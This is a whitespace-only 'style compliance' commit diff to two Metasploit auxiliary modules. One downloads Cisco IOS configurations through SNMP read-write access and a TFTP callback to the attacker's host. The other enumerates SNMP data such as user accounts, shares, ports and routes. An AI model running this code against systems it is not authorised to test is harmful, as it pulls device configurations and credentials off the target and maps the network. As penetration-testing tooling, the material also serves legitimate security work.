style compliance fixes
git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
af79f5c0ea
commit
287f4c87fe
|
@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will download the startup or running configuration
|
This module will download the startup or running configuration
|
||||||
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
|
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
|
||||||
community is required. The SNMP community scanner module can
|
community is required. The SNMP community scanner module can
|
||||||
assist in identifying a read-write community. The target must
|
assist in identifying a read-write community. The target must
|
||||||
be able to connect back to the Metasploit system and the use of
|
be able to connect back to the Metasploit system and the use of
|
||||||
NAT will cause the TFTP transfer to fail.
|
NAT will cause the TFTP transfer to fail.
|
||||||
|
@ -54,12 +54,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
|
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
|
||||||
@tftp.start
|
@tftp.start
|
||||||
add_socket(@tftp.sock)
|
add_socket(@tftp.sock)
|
||||||
|
|
||||||
@main_thread = ::Thread.current
|
@main_thread = ::Thread.current
|
||||||
|
|
||||||
print_status("Scanning for vulnerable targets...")
|
print_status("Scanning for vulnerable targets...")
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Kill the TFTP server
|
# Kill the TFTP server
|
||||||
#
|
#
|
||||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# Wait 5 seconds for background transfers to complete
|
# Wait 5 seconds for background transfers to complete
|
||||||
print_status("Providing some time for transfers to complete...")
|
print_status("Providing some time for transfers to complete...")
|
||||||
::IO.select(nil, nil, nil, 5.0)
|
::IO.select(nil, nil, nil, 5.0)
|
||||||
|
|
||||||
print_status("Shutting down the TFTP service...")
|
print_status("Shutting down the TFTP service...")
|
||||||
if @tftp
|
if @tftp
|
||||||
@tftp.close rescue nil
|
@tftp.close rescue nil
|
||||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Callback for incoming files
|
# Callback for incoming files
|
||||||
#
|
#
|
||||||
|
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
data = info[:file][:data]
|
data = info[:file][:data]
|
||||||
from = info[:from]
|
from = info[:from]
|
||||||
return if not (name and data)
|
return if not (name and data)
|
||||||
|
|
||||||
# Trim off IPv6 mapped IPv4 if necessary
|
# Trim off IPv6 mapped IPv4 if necessary
|
||||||
from = from[0].dup
|
from = from[0].dup
|
||||||
from.gsub!('::ffff:', '')
|
from.gsub!('::ffff:', '')
|
||||||
|
|
||||||
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
|
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
|
||||||
|
|
||||||
# Save the configuration file if a path is specified
|
# Save the configuration file if a path is specified
|
||||||
if datastore['OUTPUTDIR']
|
if datastore['OUTPUTDIR']
|
||||||
name = "#{from}.txt"
|
name = "#{from}.txt"
|
||||||
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
|
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
|
||||||
|
@ -104,13 +104,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
print_status("Saved configuration file to #{path}")
|
print_status("Saved configuration file to #{path}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Toss the configuration file to the parser
|
# Toss the configuration file to the parser
|
||||||
cisco_ios_config_eater(from, 161, data)
|
cisco_ios_config_eater(from, 161, data)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
source = datastore['SOURCE'].to_i
|
source = datastore['SOURCE'].to_i
|
||||||
protocol = 1
|
protocol = 1
|
||||||
|
@ -127,11 +127,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
session = rand(255) + 1
|
session = rand(255) + 1
|
||||||
|
|
||||||
snmp = connect_snmp
|
snmp = connect_snmp
|
||||||
|
|
||||||
|
|
||||||
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
|
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
|
||||||
value = snmp.set(varbind)
|
value = snmp.set(varbind)
|
||||||
|
|
||||||
# If the above line didn't throw an error, the host is alive and the community is valid
|
# If the above line didn't throw an error, the host is alive and the community is valid
|
||||||
print_status("Trying to acquire configuration from #{ip}...")
|
print_status("Trying to acquire configuration from #{ip}...")
|
||||||
|
|
||||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
value = snmp.set(varbind)
|
value = snmp.set(varbind)
|
||||||
|
|
||||||
disconnect_snmp
|
disconnect_snmp
|
||||||
|
|
||||||
# No need to make noise about timeouts
|
# No need to make noise about timeouts
|
||||||
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
|
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
|
||||||
rescue ::Interrupt
|
rescue ::Interrupt
|
||||||
|
|
|
@ -44,36 +44,36 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
||||||
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
|
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
|
||||||
sysName = '-'
|
sysName = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
|
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
|
||||||
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
|
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
|
||||||
sysDesc = '-'
|
sysDesc = '-'
|
||||||
end
|
end
|
||||||
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
|
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
|
||||||
|
|
||||||
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
|
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
|
||||||
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
|
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
|
||||||
sysContact = '-'
|
sysContact = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
|
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
|
||||||
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
|
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
|
||||||
sysLocation = '-'
|
sysLocation = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
|
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
|
||||||
|
|
||||||
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
|
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
|
||||||
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
|
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
|
||||||
|
|
||||||
|
|
||||||
year = month = day = hour = minutes = seconds = tenths = 0
|
year = month = day = hour = minutes = seconds = tenths = 0
|
||||||
|
|
||||||
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
|
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
|
||||||
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
|
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
|
||||||
systemDate = '-'
|
systemDate = '-'
|
||||||
|
@ -109,9 +109,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line("Location : #{sysLocation}")
|
print_line("Location : #{sysLocation}")
|
||||||
print_line("Uptime snmp : #{sysUpTimeInstance}")
|
print_line("Uptime snmp : #{sysUpTimeInstance}")
|
||||||
print_line("Uptime system : #{hrSystemUptime}")
|
print_line("Uptime system : #{hrSystemUptime}")
|
||||||
|
|
||||||
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
|
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
|
||||||
|
|
||||||
if sysName.length > 0
|
if sysName.length > 0
|
||||||
report_note(
|
report_note(
|
||||||
:host => ip,
|
:host => ip,
|
||||||
|
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => sysName.strip
|
:data => sysName.strip
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
if sysDesc.length > 0
|
if sysDesc.length > 0
|
||||||
report_note(
|
report_note(
|
||||||
:host => ip,
|
:host => ip,
|
||||||
|
@ -131,30 +131,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => sysDesc.strip
|
:data => sysDesc.strip
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
if (sysDesc =~ /Windows/)
|
if (sysDesc =~ /Windows/)
|
||||||
|
|
||||||
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
|
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
|
||||||
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
|
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
|
||||||
print_line("Domain : #{domPrimaryDomain}")
|
print_line("Domain : #{domPrimaryDomain}")
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
users = []
|
users = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
|
||||||
users.push([[user.value]])
|
users.push([[user.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not users.empty?
|
if not users.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("User accounts\n")
|
print_status("User accounts\n")
|
||||||
users.each {|a| print_line("#{a}")}
|
users.each {|a| print_line("#{a}")}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -162,57 +162,57 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_information = []
|
network_information = []
|
||||||
|
|
||||||
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
|
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
|
||||||
|
|
||||||
if ipForwarding == 0 || ipForwarding == 2
|
if ipForwarding == 0 || ipForwarding == 2
|
||||||
ipForwarding = "no"
|
ipForwarding = "no"
|
||||||
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
||||||
elsif ipForwarding == 1
|
elsif ipForwarding == 1
|
||||||
ipForwarding = "yes"
|
ipForwarding = "yes"
|
||||||
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
|
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
|
||||||
if ipDefaultTTL.to_s !~ /Null/
|
if ipDefaultTTL.to_s !~ /Null/
|
||||||
network_information.push([["Default TTL : "],[ipDefaultTTL]])
|
network_information.push([["Default TTL : "],[ipDefaultTTL]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
|
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
|
||||||
if tcpInSegs.to_s !~ /Null/
|
if tcpInSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments received : "],[tcpInSegs]])
|
network_information.push([["TCP segments received : "],[tcpInSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
|
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
|
||||||
if tcpOutSegs.to_s !~ /Null/
|
if tcpOutSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
|
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
|
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
|
||||||
if tcpRetransSegs.to_s !~ /Null/
|
if tcpRetransSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
|
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
|
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
|
||||||
if ipInReceives.to_s !~ /Null/
|
if ipInReceives.to_s !~ /Null/
|
||||||
network_information.push([["Input datagrams : "],[ipInReceives]])
|
network_information.push([["Input datagrams : "],[ipInReceives]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
|
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
|
||||||
if ipInDelivers.to_s !~ /Null/
|
if ipInDelivers.to_s !~ /Null/
|
||||||
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
|
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
|
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
|
||||||
if ipOutRequests.to_s !~ /Null/
|
if ipOutRequests.to_s !~ /Null/
|
||||||
network_information.push([["Output datagrams : "],[ipOutRequests]])
|
network_information.push([["Output datagrams : "],[ipOutRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_information.empty?
|
if not network_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network information")
|
print_status("Network information")
|
||||||
print_line('')
|
print_line('')
|
||||||
network_information.each {|a,b| print_line("#{a} #{b}")}
|
network_information.each {|a,b| print_line("#{a} #{b}")}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_interfaces = []
|
network_interfaces = []
|
||||||
|
|
||||||
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
|
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
|
||||||
|
|
||||||
ifindex = index.value
|
ifindex = index.value
|
||||||
ifdescr = descr.value
|
ifdescr = descr.value
|
||||||
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
|
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
|
||||||
|
@ -230,11 +230,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ifinoc = inoc.value
|
ifinoc = inoc.value
|
||||||
ifoutoc = outoc.value
|
ifoutoc = outoc.value
|
||||||
ifstatus = status.value
|
ifstatus = status.value
|
||||||
|
|
||||||
case iftype
|
case iftype
|
||||||
when 1
|
when 1
|
||||||
iftype = "other"
|
iftype = "other"
|
||||||
when 2
|
when 2
|
||||||
iftype = "regular1822"
|
iftype = "regular1822"
|
||||||
when 3
|
when 3
|
||||||
iftype = "hdh1822"
|
iftype = "hdh1822"
|
||||||
|
@ -315,7 +315,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
|
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_interfaces.empty?
|
if not network_interfaces.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network interfaces")
|
print_status("Network interfaces")
|
||||||
|
@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -343,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
|
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
|
||||||
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
|
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_ip.empty?
|
if not network_ip.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network IP")
|
print_status("Network IP")
|
||||||
|
@ -352,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -365,7 +365,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
|
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not routing.empty?
|
if not routing.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Routing information")
|
print_status("Routing information")
|
||||||
|
@ -374,7 +374,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -382,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
tcp = []
|
tcp = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
|
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
|
||||||
|
|
||||||
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
|
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
|
||||||
ladd = "-"
|
ladd = "-"
|
||||||
else
|
else
|
||||||
|
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
rport = rport.value
|
rport = rport.value
|
||||||
end
|
end
|
||||||
|
|
||||||
case state.value
|
case state.value
|
||||||
when 1
|
when 1
|
||||||
state = "closed"
|
state = "closed"
|
||||||
|
@ -438,7 +438,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
tcp.push([[ladd],[lport],[radd],[rport],[state]])
|
tcp.push([[ladd],[lport],[radd],[rport],[state]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not tcp.empty?
|
if not tcp.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("TCP connections and listening ports")
|
print_status("TCP connections and listening ports")
|
||||||
|
@ -447,7 +447,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
|
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -457,8 +457,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
|
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
|
||||||
udp.push([[ladd.value],[lport.value]])
|
udp.push([[ladd.value],[lport.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not udp.empty?
|
if not udp.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Listening UDP ports")
|
print_status("Listening UDP ports")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -466,13 +466,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
|
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
if (sysDesc =~ /Windows/)
|
if (sysDesc =~ /Windows/)
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -480,13 +480,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_services = []
|
network_services = []
|
||||||
|
|
||||||
n = 0
|
n = 0
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
|
||||||
network_services.push([[n],[name.value]])
|
network_services.push([[n],[name.value]])
|
||||||
n+=1
|
n+=1
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_services.empty?
|
if not network_services.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network services")
|
print_status("Network services")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -494,29 +494,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
|
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
share = []
|
share = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
|
||||||
share.push([[name.value],[path.value],[comment.value]])
|
share.push([[name.value],[path.value],[comment.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not share.empty?
|
if not share.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Share")
|
print_status("Share")
|
||||||
print_line('')
|
print_line('')
|
||||||
share.each {|a,b,c|
|
share.each {|a,b,c|
|
||||||
print_line("Name : #{a}")
|
print_line("Name : #{a}")
|
||||||
print_line("Path : #{b}")
|
print_line("Path : #{b}")
|
||||||
print_line("Comment : #{c}")
|
print_line("Comment : #{c}")
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -527,17 +527,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_totalBytesSentLowWord.to_s !~ /Null/
|
if http_totalBytesSentLowWord.to_s !~ /Null/
|
||||||
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
|
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
|
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
|
||||||
if http_totalBytesReceivedLowWord.to_s !~ /Null/
|
if http_totalBytesReceivedLowWord.to_s !~ /Null/
|
||||||
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
|
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
|
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
|
||||||
if http_totalFilesSent.to_s !~ /Null/
|
if http_totalFilesSent.to_s !~ /Null/
|
||||||
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
|
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
|
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
|
||||||
if http_currentAnonymousUsers.to_s !~ /Null/
|
if http_currentAnonymousUsers.to_s !~ /Null/
|
||||||
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
|
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
|
||||||
|
@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_maxConnections.to_s !~ /Null/
|
if http_maxConnections.to_s !~ /Null/
|
||||||
iis.push([["MaxConnections : "],[http_maxConnections]])
|
iis.push([["MaxConnections : "],[http_maxConnections]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
|
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
|
||||||
if http_connectionAttempts.to_s !~ /Null/
|
if http_connectionAttempts.to_s !~ /Null/
|
||||||
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
|
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
|
||||||
|
@ -607,34 +607,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_totalOthers.to_s !~ /Null/
|
if http_totalOthers.to_s !~ /Null/
|
||||||
iis.push([["Others : "],[http_totalOthers]])
|
iis.push([["Others : "],[http_totalOthers]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
|
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
|
||||||
if http_totalCGIRequests.to_s !~ /Null/
|
if http_totalCGIRequests.to_s !~ /Null/
|
||||||
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
|
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
